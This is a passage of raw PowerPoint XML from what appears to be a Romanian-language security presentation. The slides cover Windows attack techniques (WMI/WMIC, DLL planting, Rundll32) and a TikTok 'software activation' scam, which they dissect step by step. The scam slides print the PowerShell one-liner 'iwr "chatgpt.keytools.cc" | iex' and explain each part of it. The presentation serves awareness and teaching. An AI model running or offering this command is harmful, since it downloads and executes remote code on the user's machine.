                </a:solidFill>
              </a:rPr>
              <a:t>Infiltrare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WMI / WMIC to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spawna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>procese</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> host-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a planta DLL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pe filesystem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>încărca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memorie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploatare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Rundll32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execuție</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sincronă</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36396463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3529C-CB12-2B21-F811-25FDFBEA24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819D10-C46B-861D-DFAD-6DB128B1FBB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1331DC60-3254-0928-4541-0525D4C19AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="3941089" cy="780095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BONUS – TIKTOK HACKING </a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0B6779-2C99-5BB8-7EA8-071CA1D99136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B05248F-3151-7AF0-D2C9-AEF3C9561F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248088" y="2793880"/>
            <a:ext cx="374771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1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sute de video-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pe TikTok care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>învață</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilizatorii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>activeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” software pe Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{214C00D2-2087-33EA-543C-B84B0798BD2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="0"/>
            <a:ext cx="7772400" cy="6829822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21499947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C322A-9377-60EB-D5EB-503361D55D9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C305BF-6F87-EF43-035B-015B37B1EDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9825400F-06E4-5D48-2C49-E60D3BFC7239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="4404552" cy="780095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Anatomia atacului</a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59CFEA49-CB93-390C-7F90-6321097536FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C9D06D-2C46-4C6A-356C-E0D24540C907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248088" y="2793880"/>
            <a:ext cx="374771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1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pasul 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execută</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pasul 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chatgpt.keytools.cc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pasul 3: PROFIT!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="chatgpt-scam.mov">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6AF4BC4-F0C5-6B44-82B7-24EA3861B2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20143" y="0"/>
            <a:ext cx="4064000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40199585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8D7A56-7149-3660-EFAF-76A1EF5183B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381740" y="1871625"/>
            <a:ext cx="9601504" cy="4688973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>chatgpt.keytools.cc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>iex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>este</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> un alias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>descarcă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>conținut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de pe internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chatgpt.keytools.cc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>este</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adresa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> URL de la care se face </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>descărcarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aceasta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trebui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>returneze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> un script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comenzi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> format text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>transmite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rezultatul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comenzii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>către</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>următoarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>commandă</a:t>
            </a:r>
            <a:r>
